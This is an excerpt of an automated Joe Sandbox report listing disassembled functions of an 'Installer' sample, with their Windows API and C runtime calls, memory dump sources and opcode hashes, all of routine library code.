                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C,00000000,?,0035BBBC), ref: 00366957
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0036697F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: ab3efbee9ad8ceb15b24486c7ce8ec84107bda8e8e0899f93cdccbf66036687f
                                                                                                                                                                                                                                                    • Instruction ID: 2524c733d31c54e83a808d7849c54db12ab7032f6ec446441b202b169a8b1850
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab3efbee9ad8ceb15b24486c7ce8ec84107bda8e8e0899f93cdccbf66036687f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70E0E570394604BBEA321AA0EC07B697A99AB40B91F148824FE4DA84A5DB71A8909944
                                                                                                                                                                                                                                                    Function 00363F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00364001
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00364253
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00364299
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0036433C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                                                                                                    • Opcode ID: 3fa22f765355732dbc876b83f4dfb168d492ebe96ae22b6654dba01a81c8bd8a
                                                                                                                                                                                                                                                    • Instruction ID: 30de5b26e917c8ba0e45ee205cf9d6c1bf888312123a05027bdebc4488c3a53b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa22f765355732dbc876b83f4dfb168d492ebe96ae22b6654dba01a81c8bd8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D17975D002589FCF16CFE8D8809EDBBB9FF09314F28852AE956EB355D630A941CB60
                                                                                                                                                                                                                                                    Function 0035B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: 10ae7351e237bb6ec54e322e5a05a7e79e01e32540909620287f8b0dd4a2ff07
                                                                                                                                                                                                                                                    • Instruction ID: d248e9e7be1272d6a9ddbd816c5a671e496046bae4783e8e034321f0c9429c82
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10ae7351e237bb6ec54e322e5a05a7e79e01e32540909620287f8b0dd4a2ff07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E3796006059FDB2B9F50C882FAAF7A4EF04712F15452DEC466A2B1D731ED88CB90
                                                                                                                                                                                                                                                    Function 00347220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003472C5
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00347395
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 003473A3
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 003473B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2261580123-0
                                                                                                                                                                                                                                                    • Opcode ID: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
                                                                                                                                                                                                                                                    • Instruction ID: 17b88929fa81679bba1cb67cd21e432eff9166c0050404f0a018cc46265c00cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4941D2B59047058BDB22EF64C941BAAB7E8FF44320F158639E8165F691EB34F814CBE1
                                                                                                                                                                                                                                                    Function 00344460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00344495
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 003444B2
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003444D3
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00344580
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
                                                                                                                                                                                                                                                    • Instruction ID: 368d973501749918024692db23e5f4060138b3bb412c735fd32ff84e6c6b3001
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0416871D006188FCF26DF98D884BADBBF4FB49320F054269E8196B391DB34A984CF91
                                                                                                                                                                                                                                                    Function 00361DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00361E2A
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00361E31
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00361E6B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00361E72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: ffa14c7af1baedb5311d2b34e446f65b0733bed5002bc98fd63775acf3e38e13
                                                                                                                                                                                                                                                    • Instruction ID: 8bc2f35ff8a21187aeb032a5b14694d32dc86620d7e99aba21bb7ce4c20332d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa14c7af1baedb5311d2b34e446f65b0733bed5002bc98fd63775acf3e38e13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421F231600605AFDB23AF65D881C3BB7ACFF04365B19C518FC199B111D732EC008BA0
                                                                                                                                                                                                                                                    Function 00352BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0c460e149bd92b2fa04ca2c258af1b64ed0554711ba4bece82d52f1b2a880939
                                                                                                                                                                                                                                                    • Instruction ID: 23f9d25a1c83684b93f08ca119a268316203ad9f59aafdab98bf130b82a09aec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c460e149bd92b2fa04ca2c258af1b64ed0554711ba4bece82d52f1b2a880939
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3219F71204605AF9B23AF69DC81D6B77ACFF42366B114515FC559B272EB30EC4887A0
                                                                                                                                                                                                                                                    Function 003631BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 003631C6
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003631FE
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036321E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                                                                                                    • Opcode ID: bfc50a59e58c59c4754a1a52a099cd8345fd0a77f2ca8fe07f850aa0788732d0
                                                                                                                                                                                                                                                    • Instruction ID: 072fb815d42100d20cf2fd9bf15f58411994e76d108df96f26c62e3d25d94826
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfc50a59e58c59c4754a1a52a099cd8345fd0a77f2ca8fe07f850aa0788732d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 951122B150061A7EE72327B1EC9ACBFBA5CDE843A57114828FA05DA101FF60DF0481B0
                                                                                                                                                                                                                                                    Function 0034E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034E899
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034E8A3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 0034E8BA
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0034E914
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1383202999-0
                                                                                                                                                                                                                                                    • Opcode ID: 5533519127dc2bf48ce8709f26e255506314c73d5bd072606defbc22f5b16ce2
                                                                                                                                                                                                                                                    • Instruction ID: 707bf230c73dbc605cbf6ad098ca5aea5a6bf16c5e4d068d79ad36078ed7420b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5533519127dc2bf48ce8709f26e255506314c73d5bd072606defbc22f5b16ce2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211CE368002199BCB07EBA4C945AADBBE5BF84720F254108E415AF282CF74BA40CB81
                                                                                                                                                                                                                                                    Function 0036ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000), ref: 0036ADB7
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?,?,00363CD6,00000000), ref: 0036ADC3
                                                                                                                                                                                                                                                      • Part of subcall function 0036AE20: CloseHandle.KERNEL32(FFFFFFFE,0036ADD3,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?), ref: 0036AE30
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 0036ADD3
                                                                                                                                                                                                                                                      • Part of subcall function 0036ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0036AD91,0036A2DC,?,?,00364390,?,00000000,00000000,?), ref: 0036AE08
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?), ref: 0036ADE8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 67e58375ea87ec9d6a1b856cbfe6b341d7bf536f0b3f4bd010d1d99a6644f5bd
                                                                                                                                                                                                                                                    • Instruction ID: 9109f6c398f9937bbdc916606d65ec4a747ac4cdccb0c86be9f68c66c1adea69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e58375ea87ec9d6a1b856cbfe6b341d7bf536f0b3f4bd010d1d99a6644f5bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78F01C36510519BBCF331FD5DC29A9A3F2AFF087A1F018011FA0CA6521DB328CA0AF91
                                                                                                                                                                                                                                                    Function 003504F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00350507
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00350516
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0035051F
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0035052C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: 3739b4fd72965dfd99f0d456f10d44e9517a5158b9999bca39628581159b863b
                                                                                                                                                                                                                                                    • Instruction ID: 9fb4e24d89b50e4c71a22ad4bef1a8743c99a75cd5a61e0592cc5a6efbf2cd4f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3739b4fd72965dfd99f0d456f10d44e9517a5158b9999bca39628581159b863b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F05F74D1060DEBCB11DBB4DA5999EBBF8FF1C300F914995A416E6110EA30AA849F50
                                                                                                                                                                                                                                                    Function 0035B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0035B893,?,?,00000000,00000000,00000000,?), ref: 0035B9B7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
